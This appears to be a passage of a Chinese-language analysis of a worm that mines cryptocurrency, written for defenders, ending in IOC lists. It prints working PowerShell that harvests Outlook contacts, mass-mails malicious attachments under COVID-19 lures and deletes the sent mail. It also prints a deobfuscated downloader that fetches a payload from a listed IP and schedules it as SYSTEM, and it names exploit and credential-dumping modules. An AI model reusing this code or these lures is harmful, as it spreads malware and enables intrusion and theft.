bx8eDCf/96vX+5+QUuJP5jnX149/M7v9YPdgy9Pfu/rt08K8pmfXE7XB0+evfy9396rdx7uX1bffvfs7tvrn3py+XZn7zslZWN/QAHI3e+8mn76kLLXT/fvV/dfXc0pLrxY/973iu9O7j+43Pn2293dX/Tl/NvQg59c33/9xem7t5+crGn8P7ja3yOX6fXOD+69/eKnH5x+e/8ndsiZ+72efaddPf1F37l+/e2zFy+rn/rBT/yi+z91TksU809Prn+v1z/9i56cF9cVObx3yWjNHzSnXz04ffHt9en19MuH+b3Lq1WWn7+t99+2v/frq+Lgbfl8cnZvj/JFtCbx4O3x5N3vc/z83dlPXOW0+Pfi7ODN5du7n/zU/U9/4uwXfb74JL8mm3M2X7w7/fztT5Lv9vps2by9/+zTL5+W+6+/XC2f7ew/+UWv9op7P3H66sHFs/tfvfyJ3yv7vcvrH/w+5dsXpxRxTb86frgzb+9/+fqrnU8u3754cvrk9/q9ji/23nx6/van3y7mxUn56qfPXr4pXpftg9m3f9HiK0ol/cTe2av98uG9d5+/vXxNAvzp009oreUHzeL3+fark535D45/8t3xs7ef7C8vs586O/+Jz8uX326uFyff+Sp/++31uzfX95+/qVf1kyLD4sbr9uXT1bff7kyL89+byP4TD4s3k/u/z/rVg9Nj8uF2Ds5PF9++d/3VtNh7PXv4Zvrui9kXn5xdnLz+Reurh/euv/3dt7PqJ0g+Xy+f7i+ef3t1/Huf/KLTt+3k8gdfnHz56vrk+Cd29l8++M63v/P2+Un25iW5sfuvPv3Ou8v9r754TTnl++W3p8ufPDv9osAglztfXj45Pv/21bcXy5/ae71//8l69rb5Rb/P29e/1+tXxbdfnF18cXFx+vT3pq4vfvrLky8We8/bb9dPH97/ieen2Sdfnd8rfq/izd3vvrss3xVfvfj'+'iB09enLx4d1a2T14+PXnwav/3WV8fzNv8tHi7WLx+83v/5PP5T738znfmX1w8/86nn19cfP5Tv9dPvP7uu53v/ER1QGuUX81Ov5yfzb44vbp38GLn0+o7v/fi+P4zssun39mpfvDg7M2zZ9Wrdw/ukbP76qfvXjy/fHnv6uJkvvcTX3558eXr7yw+uf+qoHWPL/bPdx9+Mj9YLY9nDy5OH8xPr95+8uJkdn9GKwGvT3ZeNZRhvPvueDktPj9789OvF59c/0T97OnyxfWX9evnX16/er1Dvs5P3v/8O+Qd3PtF05en3977idMf5E/Imbm7/3vvFPeffjovV58vX//eP7g+frq/l+fzt9Xy9/ri4OTZV8c/OJ3u/dT6i7tPi2zxU9cnX6y/84NFtZjlV59Uv/fV6vd5MP/27/3txXH2sqCli7fZV7/356vr9XS+fvPdt8XJT7y4/vyT+29enO48ebJ69qC8V/30cn+1f35+8Mmr36f69k89f0kL/K+/2K/y2SfvfuL+6U+TUO00n5yfnhTHbz/5au/savru9O7LL65WL69/7y8nD5492zn+dPeLy+cvnr6+3H8y/6k3D1aff3vv9/ry+Xd+r7PjklzITz49u2q+eFA+fHd89VPTN09fkCU4vn/y5vw7By+e/qLq4OTLF9959+TBT3zyqsl+8unL7371E/PX2eIluatPf6/XOzunb89e5s9++mR6/2Ly4uVPfUKG9+1P/D5F+fI7FxSDf2fn9Vl1/fbbb7/98NMHn3y+fPblJ2/e/eDgyRfn+erL19++unjxE1ef/N4TchvfnL092y9f7p99dbb37Ph19WmT7eyv935R/va7X7x9+J3sO8f5wVMaYvvscv3F/ey79z9dvPvB4uWrn34+3fvO5KQ9e/V7ETW+pPjjXjNfv/rp1S/6zqd58+Qnfu/s/nd++icevjh4WtC68ax4+/bs4vhNvji4l+/89PrbP708ePjp7/P2B78XuQEnz89+4geLZXF8sP/20+qnm/n+TzydLs8ekP+0nhavv/q9n3x++ur3eTV7d/fJydvf64uTr37qLFv+5N5Pv/uJ785fv3u7fzVvpz997zvP7727Wv7g3dUXy9/rwZc/8fbtmzcvv/jy5KvPrz/P8x98/vv8oFhMvrP3evL09bPvPF8Wl9959+VPXJztfPKT++Wr17/PJz/xi+6Rm/Kdt9NX36nWJ995/nzn/vGb9vTdtyke2Ls4+c6Tg+OffP4Tz87efXn9E3vzyfFPPrv75Rtan3r1+xz8xOn9s89ff5I9eba7vHf1RTNfnH5+d/c+5Vquzk7PT1/X7769/+b1u9Pz8he9Oy3Ov5r/oie/95OvTn968qZ5vbr+fe7t55evTh4+fL16t798sD//bvZTT769evp7/8S9hy/fPt/Z/8716U9f7mcH99/t/V4/1Tx5dv/e5duCVNuT5+3zq1n15buv5m9evXhIPvRP3N35fa7JzF9c3P3qNFtOv7P+farjb5ffoQXk3U9eXix+r9/r6vf+qesVRe1fPDjLn50cXEy/eDZ9O394fPfyB0/f/OCT2Q9ePXn31ee/19nv3e78dLX'+'zZXbx7ifePKGg44xI/vTgYPWTO199/nLZHv8+11+8+87l3rMvz746nazyL36wvvqE1PX14ovyJ8++fDCt3hVfPn3y+cPLr16unpz/9HXx5AckL7/35duHL774dvPV+qfePKme/D7llFL298vVT1yeLX/y2wf1d5/TWtjrFy+ffP7t1e/19PV3F4vf6/c+/fQXvfr89zo9fnB27217Olutq8liunf27t7dt0/PHhzMl89mT65evS0fvP5FZ/eL+3vz6f1PZq/ufXn+7uTp5RfNvZPm8qv81ZPZ26++WHz1E2dX1Xd/ryfl1eT+7/Xq/oPPKd57vXhw/NW0/L13Xj87OLv4zo'+'O9T3/iujxblO319Ntf/F7Nt8/PfuI7J0X1k1ev9t5Mrs9P3u7+xNN6f/8nXhRPZs8pX3z23eoX/cT0Oz/RVLOT5z99/vs83F/cffPs+ao83/npZ1e7Jxffef17tQ+fHX/5E9/e+Wpn/jzfPb63+/Jqevf+5U+c3//ppz/x7VdfPX1QvHy3zO8fFJP6+m67k1Mc/AXl'+'Hd59fjGrPilef3H/9dPLq8n07ZvVT1x9h7p7/dXdM/KEFy/fLn+fxfyrnS9P7xXZT3/5Uw9PKW/58qf3337y05TjPr07fXhSvrg6/mL/p5+8zl/+op+42F98/vmD49X0J3d+0ezlyZu9L2kh9UH78kH59LufXpI+2yk+XeWvvnP1E5fNxU98+nsd3z39Ra8nV7/ou69ffPKmmDR3z37vF9+u24vmxeX6q09nn/705MXv/XtfT/PsyYPFzt3llw8mn++cz+/vvPjupP3kB28/zZ9f/NSD6190+e6nX9x/cT779Ks3+9XDZ8+/3Zzc+8n1D5aT0+/kp4v68we/V9O8Wl7MfrDz3b3n5Rc/fXzv93nze739/NXJu4dPT6+eXv3E7/Nyf0r6apVd3Pv84fN3b+b3Hzw4uPvgwaLen2dfLpsHXz549RPzL746++7809Wni+z3+s7vUz5ry+onr/fXX52uzpcnq7cHv8/dV6dfXlbz9ZN8Tcs5Tz9fZi8nJ6t3B7/o/CJrVlc7ewcvD052fuo7J6/uvX46eXVx8XsV59Pf5/ehbOGTi9fz5/Xr+cF36v3ld788f3uXHOb1D/Jn5zu/19Vq9eb3Wt4/Xazyk+m9xe8zff2sXu/83pTEPfvki5eff/Xg+jufzC+fLl/Nz1//3l9VP/X2vCI3++Ll569nBz99f7+uLtaU25o1FOKsfq/my7uvKPY+/al3++X8qzdvJ/ePd3Ym+cUXLxY/eHPvi/xssvvuDSmqt+WX+9d7L7PVp9eUcv6pxe/99MFPz5brvXs/db9t984nB9+dnn7+g+IHT8rj3+fqdb5++t1ZQYnjByfNs8vd32e2Uz88X/zev+jui3P9/92f/HTyyYOdveXdSXb+xap9Wv10UX05P73fLA/eze6+evPtd79X9lOfX7zKpz/I3uYH1dN3P/VTi71PJqQE1s01ZZdmzU+93Z08f/6de68+f3nwE/n6xeTey99rdf8HlwfPzu9Xq4vf++GX+euX7fLZdz5pyrs/tXf5+d6Dp8u71wWFN/lP/V6793/qJ7/6vX/yJ/d2du++uXe1n9/dO/v2F/d27v3gJ39q/flX3z7fn1xRWFpmZ+u719++eD07P8muZw+PfzIrz2a/z/L8Ojt4sv/5wfOT/ZP829OXv/cPXj67O8kf7v/kA2TQL6sH1y9/8tP7dx/cf3j+8hd98vwH72jNa/rlvcv82fwHq2bnk1W+93tdt6ufXv3U5+/q5t7szcW9tzsvHi4ekhfyyeLJ6m6+SxrtBz/xBcWBy8+v9r79i+7VzXlLeYRf9CCryvYHn2QHyxeTojib7P+ivR8cv9yZVS8vKR+33JsQ/Puzn1r+5L2v9r77i0gO19998PtMzx4sHvw+V/nl7ur5V/vnJ3vHORnQq+fZupxPz49P9t/ufFkWL6afZFW9LN8e7331ySenb2lRY/FTP3X/k997nv/g6uF8smqXz9/Of5/Z/fKr+9efXO68Of90fff8F/30ydnyoHq7Oq8fnK2u85988HT98s3p87vLd9PvHrz5ybsvvzt9dTn/qatnzyjsu/jO/u/9g3zv8+z3+vz0q7t70+rNk5+8d+/F7/Pw6jvNZTNfvvu9V/N3v+gnP/10ll09/OnzJ3uUGfnu7/X51e91ff0TxU89+fQH188++fLip3/Ry9/72aenx1+cVvXBZfUT+58f53sPH3zy5OTT8+88ufd7N5fLJ5+Sh7Sz84seUtp1d/rJybeXD548/fbTTya/aGd6+Z1Pfp97zU8c1MWzh5f3q/lX79bHP/m2pRXx48X9V8f526ufmn/5e//ev88XB/Pz/Pj43sXz6Q9+n3qe7T+f1E8++eThLzq+94v2f9FlkTefL189O/n287NP67vPn1fVszfTyeWrdy/2vpp+/tPTy/Ovfmry098lgTj98sn5znK3/L0fHP/Ug5PL3/vp9Kd2mt9r9Z3VtJrdXx88n72qdx/+4Ns/fV7tZQffOfju8U9U1flP5/v3H1x8MnmYlxdf/qL86eQnvt1e/t7n73bnD3a/83v93g9fvHo6q+5/evDtgzc/9Ys+qXdePPhq9xd98tO7D4ufuvzq4bfXJ+v7tJC0fvjk3s79F5fX+brdffrmwdXy3bOiri5/n9knJ9e/986y/On8Jy4WFD6/Xl5c/NRP7rxcf/nJ9e9TPvz2/u9zrzz7zuXr85/47qfFxcN3D/ae/9Sbn/hk79n9z+m98+LBpz/9uq7uLZsvP3lL7b/zYP/eV/vcfu/TBdp/ivb59Xc+5X7mTy6r3+f5F+vPD14cvPup3+vTp3vvLs++ep3/9CdnL7j9vR88/6nfG+3ve+3JAS7uffXV8wcP9n/v8qe/qquX02/PVmfPv6iaz9vj2f0vTyY0hHr25ifWB995+OT3+UWf0prd+dUB4XP'+'/97n3lvE/VfzvGfzfvqOEB4WOX+18+/LLT34w+b1+r2/fe/XyJ777ev3TD89e3P/8yWz37g/uffv8F529WV++++T3enG9mD+8IjP/7vfeuVe9zFdnr6efPr9a1vXsJ9DvwSvq9/net88vmki/9+69Ibzvvjk5WL2ifj89uffV6bcvX+bvuN+ru2d71O+bh/sv9t9e1Z8+fLrz7fPsi9d71U+f7+7+5AnN187Mn69K5+vg1eQX/V5PKbM5bcsXTx7Q+uTz79By9unnD1//RH7w4H7Z/KLqfHZ6MAetd+aE07N7v/ek2nn13d/n3u99Qvr4YDn5qcVytX/5ky8/X/9e98ts/5PlcXvv+d5PXC5+qnx39fyT4++8uZxnxz95/yfP75NYL68/WXy7Ps2e7ezNrmar47tPviyvzlYPv9qdkS746vOzb19l7U9QHusr8rSr9dlPrj+5fPr7zJ7Onz1/QN7Gm4ezYv/5vcndt+VdrGUdPP34Dj2j9HtnX45PqsWqzpumqJb+719Us/z7jx49zaf6Gbd/k79rx6dLkp1ieUFfH78+OTu7c2f8Ks9mb6rT5WyL/qjzVZlN862PjvX5aPS7kYMz/f3boi1z7/sn+tjvCbr39TQrp+P8XU5fz2b57z9dzO78xsnW71a357//nPrL60/w+7hZT5q2Jny27t258zPVut0+L8o83c4VzTRrpkWR/m5Z2/7+1MtvnPzGyf8D')))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd()
$global:contacts=@()
$global:sent_tos=@()
$global:recv_froms=@('+')
$global:mail_pools=@(
("The Truth of COVID-19","Virus actually comes from United States of America"),
("COVID-19 nCov Special info WHO","very important infomation for Covid-19
see attached document for your action and discretion."),
("HALTH ADVISORY:CORONA VIRUS","the outbreak of CORONA VIRUS is cause of concern especially where forign personal have recently arrived or will be arriving at various intt in near future.
see attached document for your action and discretion."),
("WTF","what's wrong with you?are you out of your mind!!!!!"),
("What the fcuk","are you out of your mind!!!!!what 's wrong with you?"),
("good bye","good bye, keep in touch"),
("farewell letter","'+'good bye, keep in touch"),
("broken file","can you help me '+'to fix the file,i can't read it"),
("This is your order?","file is brokened, i canzT'+'F5nt open it")
)
$curr_date=Get-Date -Format "yyyy-MM-dd"
function get_contacts($ol_folders){
$folders=$ol_folders.folders
if($folders.count -ge 1){
foreach($folder in $folders){
get_contacts($folder)
}
}
foreach($item in $ol_folders.items){
if($global:contacts -notcontains $item.Email1Address){
$global:contacts+=$item.Email1Address
}
}
}
function get_recv_froms($ol_folders){
$tcount=$ol_folders.items.count
for($i=$tcount;($i -gt 0) -and ($i -gt ($tcount-500));$i--){
$item = $ol_folders.items.item($i)
if($global:recv_froms -notcontains $item.SenderEmailAddress){
$global:recv_froms+=$item.SenderEmailAddress
}
}
}
function get_sent_tos($ol_folders){
$folders=$ol_folders.folders
if($folders.count -ge 1){
foreach($folder in $folders){
get_recv_froms($folder)
}
}
$regex = [regex]"(?i)\b[A-Z0-9._%+-]+@[A-Z0-9.-]+\.[A-Z]{2,4}\b"
foreach($item in $ol_folders.items){
foreach($m in $regex.matches($item.To)){
if($global:sent_tos -notcontains $m.value){
$global:sent_tos+=$m.value
}
}
#$global:mail_pools+=,($item.subject,$item.body)
}
}
f'+'unction del_sendmail($name,$size,$flag){
$ol_out=$ol.Session.GetDefaultFolder($flag)
$tcount=$ol_out.items.count
for($i=$tcount;($i -gt 0) -and ($i -gt ($tcount-200));$i--){
$item = $ol_out.items.item($i)
foreach($attach in $item.Attachments){
if(($attach.Filename -eq $name)){
$item.Delete()
write-host "Delete mail with attach:"+($attach.Filename)+"..."
break
}
}
}
}
function Add-Zip
{
param([string]$zipfilename)
if(-not (test-path($zipfilename)))
{
set-content $zipfilename ("PK" + [char]5 + [char]6 + ("$([char]0)" * 18))
(dir $zipfilename).IsReadOnly = $false
}
$shellApplication = new-object -com shell.application
$zipPackage = $shellApplication.NameSpace($zipfilename)
foreach($file in $input)
{
$zipPackage.CopyHere($file.FullName)
Start-sleep -milliseconds 500
}
}
$ol=Ne`w-Obj`ect -Com outlook.application
get_contacts($ol.Session.GetDefaultFolder(10))
get_sent_tos($ol.Session.GetDefaultFolder(5))
get_recv_froms($ol.Session.GetDefaultFolder(6))
$muser=$ol.session.accounts.item(1).smtpaddress
$att_zip_name="readme.zip"
$att_zip=$env:tmp+"\$att_zip_name"
dir $att_js|Add-Zip $att_zip
$att_zip_filesize=[io.file]::readallbytes($att_zip).length
(New-object net.webclient).downloadstring("DOWN_URL/report.json?type=mail&u=$muser&c1="+$contacts.count+"&c2="+$sent_tos.count+"&c3="+$recv_froms.count)
$ran_index=(get-random)%$mail_pools.length
$mail_subject=$mail_pools[$ran_index][0]
$mail_body=$mail_pools[$ran_index][1]
del_sendmail $att_zip_name $att_zip_filesize 6'+'
foreach($sent_to i'+'n $sent_tos){
if($contacts -notcontains $sent_to){
$contacts+=$sent_to
}
}
foreach($recv_from in $recv_froms){
if($contacts -notcontains $recv_from){
$contacts+=$recv_from
}
}
foreach($contact in $contacts){
$mail=$ol.CreateItem(0)
$mitem=$mail.Recipients.Add($contact)
$mail.Su'+'bject = $mail_subject
$mail.Body = $mail_body
$mail.Attachments.Add($att_doc,1,1,"readme.doc")
$mail.Attachments.Add($att_zip,1,1,"readme.zip")
"Sending mail..."
$mail.Send()
write-host "Send mail to $contact succ..."
sleep ((get-random)%5+5)
del_sendmail $att_zip_name $att_zip_filesize 4
del_sendmail $att_zip_name $att_zip_filesize 5
del_sendmail $att_zip_name $att_zip_filesize 3
}
remove-item $att_doc
remove-item $att_js
remove-item $att_zip
"Done"
}
'@.replace("CORE_URL",$core_url).replace("DOWN_URL",$down_url)
if(([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")){
$sesscmd='powershell -c $pipe=new-object System.IO.Pipes.NamedPipeServerStream(''\\.\pipe\HHyeuqi7'');$pipe.WaitForConnection();$sr=new-object System.IO.StreamReader($pipe);$cmd=$sr.ReadToEnd();$sr.Dispose();$pipe.Dispose();I`Ex($cmd);(new-object System.IO.Pipes.NamedPipeServerStream(''\\.\pipe\HHyeuqi7'')).WaitForConnection()'
[Utils.ProcessExtensions]::EnumSessionsAndExecCmd($sesscmd.Trim())
$pipe='+'new-object System.IO.Pipes.NamedPipeClientStream("\\.\pipe\HHyeuqi7");$pipe.Connect();$sw=new-object System.IO.StreamWriter($pipe);$sw.WriteLine($mail_code);$sw.Dispose();$pipe.Dispose()
(new-object System.IO.Pipes.NamedPipeClientStream("\\.\pipe\HHyeuqi7")).Connect()
"Done and exit..."
}else{
I`Ex $mail_code
}
new-item $env:tmp\godmali4.txt -type file -force
该脚本首先检测了是否存在outlook,如果存在则遍历通讯录并发送带有恶意宏的word文档,同时清除发件箱中的记录。
发送的主题和正文内容为以下随机一组,均为诱导受害者打开带有恶意宏的Word文档
主题 The Truth of COVID-19
正文Virus actually comes from United States of America
主题 COVID-19 nCov Special info WHO
正文very important infomation for Covid-19,see attached document for your action and discretion.
主题 HALTH ADVISORY:CORONA VIRUS
正文the outbreak of CORONA VIRUS is cause of concern especially where forign personal have recently arrived or will be arriving at various intt in near future.see attached document for your action and discretion.
主题 WTF
正文what's wrong with you?are you out of your mind!!!!!
主题 What the fcuk
正文are you out of your mind!!!!!what 's wrong with you?
主题 good bye
正文good bye, keep in touch
主题 farewell letter
正文good bye, keep in touch
主题 broken file
正文 can you help me '+'to fix the file,i can't read it
主题This is your order?
正文file is brokened, i can't open it
ode.bin 下载者
$(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$('edbd07601c499625262f6dca7b7f4af54ad7e074a10880601324d8904010ecc188cde692ec1d69472329ab2a81ca6556655d661640cced9dbcf7de7befbdf7de7befbdf7ba3b9d4e27f7dfff3f5c6664016cf6ce4adac99e2180aac81f3f7e7c1f3f225ee76d9a6e7dfcf4e34f3edefdbd8e3ffdf80efd95a61fa5e99df4cea7f7beff2a9b4fbf37faf87aa7fe38cda759f9f2f4d576fad07c7e67e7a1fcf6c9c3dd5df3db81fc4250ec0b7bda6c74e7e1be36dbdd332fdcb32f98f6773efe8d93df3821047eeaeaf7d9bd7e4dff8eee3c78f0fd57c7684e88ee5067f4e3d531fd838ff6efe33bfa83806c9d1290555e8f197bbcf1fd8b176775db50e7dc270339d835bf7dfaa9fce2bdb8df7d911038787545ffba36208176efe0efdd37e0f7f59707a61f1fbcc1425e242078f7537a977e95d70f0c1c1db4f73661f14b409d5f42bf7c42ffff31fd89cff4d71c3f0916fd288bf3d47cba721f5fcb0f7cdc6edbdfe997df27dd9fb799fcaa9facae2fb529fdf5447f4d17797bb6ed5ebbcaed3bbfcf8b1f7338d95f7e097f265df9283fd3dfef1ac0fa93e8dde8af93cb71dbeaef5f2cf5974fbf587eba22241e19e4cc17b945f7c94f5177b6d303308c7e7395d6edddf440ff7a75952f32f33a8df609f59d2eb5470caa8bdbcefdb45ad017f6f3d3375fbd383318722be9736a867037cddb2cafa777d3e66d93b5f369934eef529b347f978f67da6831fd858632f49547c4df38698806fa67dbd2c8bfd03f8806e6e5dc7cffe872697ebfd69f974fd299a5cf6a75bc6d79a22c9e6116a93f7e77fda519d2c1effd22dddf599b76b3623eb91c598ae9cfabfd1dfd6d9d7e92ce0d06d92a5fe8efd9d220e84d8b76f189c182fa31bf128574d6e88fd962eae6285daeeb7183ef1c5a96461e731972792c43bce2f8dda35840aa4b8b97fe64da7429e2fad9a11f6bfaff1dfd9e98a62cf3f9ebb1e97755d453c8f677dd18b6f437d3649afff4e44be68c9fb27370e211e033d377033e4ccd6bf9eb7dfd6d676d29e0b3cb2f36a36acafc97fcd88fb19c31bb1192739e1ecbeff4a99ba1271eb921216e680e274fb92c8cccf397810811d11bfdf3aa9ab9b797c577e92b371bed7965da55f5b4f882be3cb0dc058c97ed5df336ff48217cda60e109a0fef6d50bfde5ec8b74dadc4dbf387df3faf7d18f5e9bd6ebda0e4d09856140edc96724a7a6a941eeadf925339320329c1a4abf332f13a8f1ccb0ff547f1ac1463f321ffac52f36ec43dfb4c5a2ce572cb342202b315be7fa5b8197dd1bfa3b13e617dfb9e3a471273f375ac52008fd37997d6afedac976e53d6e73be73ff60ffc0f472efc18307faeb4387f7a7fbd9bdf3dc715efa8b723500bf4f7ae7ce9d390c999090e182c9f4eb253862abc9dbeb276579ac1fce2cb9f5e7ab478fbe0f991b7f7946aec0fdd9e2626bcb4c9319cc32db66a74009045e3650c2de0c625e8b6d33738488feb6b5755ef87273c7536116aefe02f02aa24b99a49f826275c8f4b523a47f91d599b3a04f7e0fd38107950738ded9bbbb67e66f6fbc7f7f577f1f3f7c387e60a66df7aee1cc470641abe70cee077023acaa218a9ed3df868059457f9490541e0bcf1409e8f88e81b2cc0bfd0d0da7fafb24bf1ab7f9326da766b67e7aa2bf1861dcbeca97a653c7a4a48bf437624f4b5d838ce340cc194d96f9e2636825fbe576db98d1b45bbf2bcd99056efb211505530ac526ea875e26ffc000b45e027dbccc1d7fc0d27f968a4a347d7b16eb89370e7af3ce9d8374b15e98eedf99c933d6d89ad57d6eb62cbeb09f2c0c991c27bf32d2d3e69f6fa5ed725d9d5838ae39da5103ab8af5e7ef4de8185597ded9dbdb35eec1b823b9bf8f9993ef9b9fdfab9dab96cda7df33ed4c179ead2ce85760a27cffd3db442cfdcaf0c14d64d35fac52c7a45e54e5f8adfefdd62894b7e613e7e2594b6dfaec4d2770f52c384d277d6050fc2c751cc71c25f3beb5050df27be39befefdffb5efec597df7ebda2f8e693efefee51abefd1ff4f175f7ebbc167140a8d3fdea2373efe7859543fbdfdfdbdd1eeee885e5a642fc6773efe563dfbe25b1fa7a7cf9f1c9fbdca2eb7dfe4d059bf50a2a7c374fba7bf3c7b41203e3f6db7cfdafc8b74eba3cbe3bac83efae4a3c973fae7f4d1d3ddb7c7f4cba71f51ac33be3c2ebfcabfb7bd3b1e6f6fbddf4be3f2f4c5e76fe677be9ffecc98fadbfa5ef3e6d5d98bcfbfffbb5d9ebe7af26573faf255feecb43e5d9ee477be47e87fff938f7fef8f19b98f3fbef31b27ff0f'-split'(..)'|?{$_}|%{[convert]::ToUInt32($_,16)}))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();
简单解密去混淆后
& ((geT-vaRIABLE '*Mdr*').Name[3,11,2]-join'')((('. ( $psHOmE[21]+$pSHOMe[34]+'X')(('$path4 = "$env:temp6nMkk4kk.log'
$pname = -join ([char[]](97..122) NX8 Get-Random -Count (Get-Random -Minimum 4 -Maximum 8))
$pnamepath = "$env:tmp6nM$pname.exe"
if(!(test-path $path4)){
(new-object net.webclient).downloadfile('http://167.99.154.202/20.dat?$params',$pnamepath)
if((test-path $pnamepath) -and ((gmd5 ([IO.File]::ReadAllBytes($pnamepath))) -eq u04ef3a4697773f84850fe1a086db8edfe0u04)){
if($permit){
&cmd.exe /c schtasks /create /ru SYSTEM /sc MINUTE /mo 50 /tn '\Microsoft\Windows\$pname" /tr '$pnamepath" /F
}else{
u04Set ws = CreateObject('Wscript.Shell")u04 | Out-File $env:temp6nM\tt.vbs
'ws.run 'cmd /c ' + $pnamepath + u04',vbhide' | Out-File -Append $env:temp6nM\tt.vbs
&cmd.exe /c schtasks /create /sc MINUTE /mo 50 /tn "$pname' /tr '$env:temp\6nMtt.vbs" /F
}
New-Item $path4 -type file
}
}').replacE(|,|).replacE(',').replacE('"',").replacE($,[strINg]$).replacE(\,'\') )
')-REPlace \,\ -REPlace ',' -REPlace '$',$) )
主要功能从167.99.154.202
下载20.dat
并设置为计划任务,下载的文件是一个pyinstaller打包的可执行文件
if.bin 横向核心文件
脚本解密后为1W+行的powershell文件,粘贴后篇幅过长,故文章截取主要功能进行说明
在后续横向扩散过程中标识受害机存在的漏洞并从http://t.amynx.com
下载以下存在对应漏洞的文件:7p.php
、ipc.jsp
、ipco.jsp
、ms.jsp
、mso.jsp
、rdp.jsp
、rdpo.jsp
、core.png
(通过参数rds
、rdso
、ssh
、ssho
判断主机存在的漏洞)、smgh.jsp
、smgho.jsp
、logic.jsp
、logico.jsp
依次尝试ipconfig /all
、ipconfig /displaydns
、netstat -ano
获取本机内网地址网段,并访问https://api.ipify.org/
获取本机外网IP用于后续扫描
脚本内置C类网段:
- 192.168.0
- 192.168.1
- 192.168.2
- 192.168.3
- 192.168.4
- 192.168.5
- 192.168.6
- 192.168.7
- 192.168.8
- 192.168.9
- 192.168.10
- 192.168.18
- 192.168.31
- 192.168.199
- 192.168.254
- 192.168.67
- 10.0.0
- 10.0.1
- 10.0.2
- 10.1.1
- 10.90.90
- 10.1.10
- 10.10.1
- 172.16.1
- 172.16.2
- 172.16.3
内置模块如下
-
MS17-010
扫描+利用模块
-
SMB1/2
匿名登录扫描、暴力破解+利用模块,用于将批处理文件复制到远程机启动目录下
-
IPC
空连接扫描模块
-
Hadoop yarn
框架RCE模块
-
weblogic CVE-2020-14882/14883
RCE模块
-
mssql xp_cmdshell
命令执行模块
-
内网扫描模块
-
USB
快捷方式漏洞利用模块
-
利用powerdump
转储本机Hash模块
-
利用Mimikatz
获取本机Hash模块
-
SMB-Ghost
漏洞利用模块
-
SSH
爆破模块
-
探测是否为公网IP模块
-
redis
命令执行、写计划任务模块
-
RDP
暴力破解模块
-
预置字典,用于组NTLM hash、爆破模块
-
扫描信息回报模块,用于将扫描的信息回报到http://d.ackng.com/log.json
kr.bin 挖矿核心
脚本功能如下:
IOCS
IP
- 128.199.183.160
- 45.61.139.154
- 161.35.107.193
- 66.42.43.37
- 167.99.154.202
- 139.162.80.221
- 128.199.183.160
- 128.199.188.255
- 167.71.158.207
Domains